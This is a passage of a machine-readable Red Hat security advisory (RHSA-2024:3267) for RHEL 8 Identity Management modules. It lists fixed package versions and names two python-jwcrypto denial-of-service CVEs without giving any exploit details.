| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for the idm:DL1 and idm:client modules is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. \n\nSecurity Fix(es):\n\n* JWCrypto: denail of service Via specifically crafted JWE (CVE-2023-6681)\n\n* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:3267",
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2260843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260843"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "RHEL-28842",
"url": "https://issues.redhat.com/browse/RHEL-28842"
},
{
"category": "external",
"summary": "RHEL-29908",
"url": "https://issues.redhat.com/browse/RHEL-29908"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_3267.json"
}
],
"title": "Red Hat Security Advisory: idm:DL1 and idm:client security update",
"tracking": {
"current_release_date": "2026-06-02T15:12:37+00:00",
"generator": {
"date": "2026-06-02T15:12:37+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.1"
}
},
"id": "RHSA-2024:3267",
"initial_release_date": "2024-05-22T11:47:22+00:00",
"revision_history": [
{
"date": "2024-05-22T11:47:22+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-05-22T11:47:22+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-02T15:12:37+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:8::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client",
"product": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src (idm:client)",
"product_id": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client",
"product": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src (idm:client)",
"product_id": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19692%2Bfac39a03?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client",
"product": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src (idm:client)",
"product_id": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client",
"product": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src (idm:client)",
"product_id": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-qrcode@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"product": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src (idm:client)",
"product_id": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"product": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src (idm:client)",
"product_id": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src (idm:DL1)",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src (idm:DL1)",
"product_id": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1",
"product": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src (idm:DL1)",
"product_id": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1",
"product": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src (idm:DL1)",
"product_id": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src (idm:DL1)",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1",
"product": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src (idm:DL1)",
"product_id": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product": {
"name": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src (idm:DL1)",
"product_id": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-kdcproxy@0.4-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src (idm:DL1)",
"product_id": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-qrcode@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src (idm:DL1)",
"product_id": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src (idm:DL1)",
"product_id": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src (idm:DL1)",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src (idm:DL1)",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client)",
"product_id": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-common@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client)",
"product_id": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-common@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client",
"product": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch (idm:client)",
"product_id": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck-core@0.12-3.module%2Bel8.9.0%2B19692%2Bfac39a03?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client)",
"product_id": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-python-compat@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client)",
"product_id": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-selinux@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product": {
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client)",
"product_id": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaclient@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client)",
"product_id": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipalib@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch (idm:client)",
"product_id": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"product": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch (idm:client)",
"product_id": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"product": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch (idm:client)",
"product_id": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"product": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch (idm:client)",
"product_id": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode-core@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"product": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch (idm:client)",
